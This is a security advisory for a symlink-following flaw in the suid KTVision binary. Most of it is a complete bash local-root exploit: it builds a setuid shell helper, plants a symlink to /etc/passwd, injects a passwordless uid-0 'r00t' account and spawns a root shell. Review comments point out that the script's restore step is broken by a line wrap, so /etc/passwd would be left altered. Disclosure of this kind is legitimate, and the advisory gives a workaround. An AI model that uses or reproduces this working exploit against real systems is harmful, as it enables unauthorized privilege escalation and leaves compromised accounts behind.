COMMAND

    KTVision

SYSTEMS AFFECTED

    ktvision prior to 0.1.1-271

PROBLEM

    Paul Starzetz found the following.  There is a symlink-following
    problem in the ktvision binary, which many distributions install
    suid root: the program opens its per-user configuration file with
    root privileges without checking whether that path is a symlink.

    It is discouraging that such trivial symlink attacks are  still
    possible today.  No further comment.  For completeness, a  bash
    script demonstrating this vulnerability is attached below.  Note
    that it rewrites /etc/passwd on the host it is run on; treat it as
    a proof of concept for a disposable test system, not a diagnostic.

    #!/bin/bash
    # Proof of concept for the ktvision symlink-follow issue described above.
    # What the script does, in order:
    #   1. builds a small setuid-shell helper (sush) in the current directory;
    #   2. backs up $linkto, then plants a symlink $link/ktvisionrc -> $linkto;
    #   3. starts the suid ktvision binary and polls until $linkto is owned by
    #      the invoking user (test -O), i.e. until the binary has followed the
    #      link with its root privileges;
    #   4. appends a passwordless uid-0 entry to $linkto, su's to it to make
    #      sush setuid root, restores $linkto from the backup, and runs ./sush.
    # NOTE(review): step 4 modifies /etc/passwd.  Run only on a throwaway
    # system, and read the note on the su -c restore step below first.
    
    # Paths are hard-coded for the author's machine: $link is the invoking
    # user's KDE config directory, $target the suid binary.  Adjust as needed.
    link=/home/paul/.kde/share/config
    linkto=/etc/passwd
    target=/opt/kde/bin/ktvision
    
    echo ""
    echo "KTVision <= 0.1.1-271 local r00t exploit by IhaQueR"
    echo ""
    
    # -u: the target exists and carries the setuid bit.  Without that bit
    # there is no privilege to gain, so bail out.
    if ! test -u $target ; then
	    echo "[-] $target not found"
	    exit 1
    fi;
    
    echo "[+] $target found"
    
    # Write the helper source.  The glob also removes any unrelated sush*
    # files in the cwd; the heredoc appends (>>), which is only safe because
    # of that rm.
    rm -f sush*
    cat <<__DUPA__>>sush.c
    #include <stdio.h>
    main()
    {
	    setuid(geteuid());
	    setgid(getegid());
	    execl("/bin/bash", "/bin/bash", NULL);
    }
    __DUPA__
    
    echo "    compiling sush"
    # NOTE(review): $(...) captures only gcc's stdout; its diagnostics go to
    # stderr, so $res is normally empty and the effective check is '-x sush'.
    res=$(gcc sush.c -o sush)
    
    if test "$res" != "" -o ! -x sush ; then
	    echo "[-] failed"
	    rm sush* ktvback.*
	    exit 2;
    fi;
    
    echo "[+] success"
    
    # Keep a copy of $linkto so it can be put back after the privilege grab.
    cp $linkto ktvback.$$
    # Plant the symlink where ktvision expects its per-user config file.
    mkdir -p $link
    rm -f $link/ktvisionrc
    ln -s $linkto $link/ktvisionrc
    
    echo ""
    echo -n "now running... (ensure that X is up and running)"
    
    # Launch the suid binary in the background (it is an X client, hence the
    # reminder above) and remember its pid so it can be killed later.
    $target >/dev/null 2>&1 &
    cpid=$!
    
    declare -i cnt
    declare -i max
    cnt=0
    max=60
    
    # Poll for up to $max seconds until $linkto is owned by the real user.
    # The exploit evidently relies on the suid program chown()ing its config
    # file through the symlink; that is inferred from this check only, the
    # binary's behaviour is not shown here.
    while ! test -O $linkto ; do
	    sleep 1;
	    printf "  %.2d" $cnt
	    cnt=$(($cnt+1))
	    if test $cnt -ge $max ; then
		    echo ""
		    echo ""
		    echo "[-] FAILED"
		    rm sush* ktvback.*
		    exit 2;
	    fi;
    done;
    
    # Stop the binary and remove the planted link.
    kill -9 $cpid >/dev/null 2>&1
    rm $link/ktvisionrc
    
    echo ""
    echo ""
    echo "[+] SUCCESS, creating sush"
    # $linkto is now writable by this user: append a passwordless uid-0 entry.
    echo >>$linkto "r00t::0:0:root:/root:/bin/bash"
    echo ""
    # As the new uid-0 user: make sush setuid/setgid root, restore $linkto
    # from the backup and hand it back to root.
    # NOTE(review): as printed in this advisory the quoted su -c string is
    # split after 'cp'.  Inside the double quotes that newline ends the cp
    # command with no operands, and 'ktvback.NNNN $linkto' is then executed
    # as a (non-existent) command, so the restore never happens and $linkto
    # is left with the injected r00t entry.  This is most likely a line-wrap
    # artifact of the advisory; the original was presumably one line.
    su r00t -c "chown 0.0 sush; chmod u+s sush; chmod g+s sush; cp
    ktvback.$$ $linkto; chown 0.0 $linkto"
    rm ktvback.* sush.c
    
    # Sanity check: the su step must have produced a setuid sush.
    if ! test -u sush ; then
            echo "    hm strange error"
	    rm sush* ktvback.*
            exit 1
    fi;
    
    echo ""
    echo "starting ./sush"
    # Run the setuid helper; it setuid()s to its effective uid and execs bash.
    ./sush
    
    #!plonk

SOLUTION

    Nothing yet from the vendor at the time of this advisory.  As a
    workaround, removing the setuid bit from the ktvision binary removes
    the privilege the demonstrated attack depends on (at the cost of
    whatever function required it).  Note also that the affected-version
    statement above ("prior to 0.1.1-271") and the exploit banner
    ("<= 0.1.1-271") disagree on whether 0.1.1-271 itself is affected;
    treat that release as suspect until confirmed.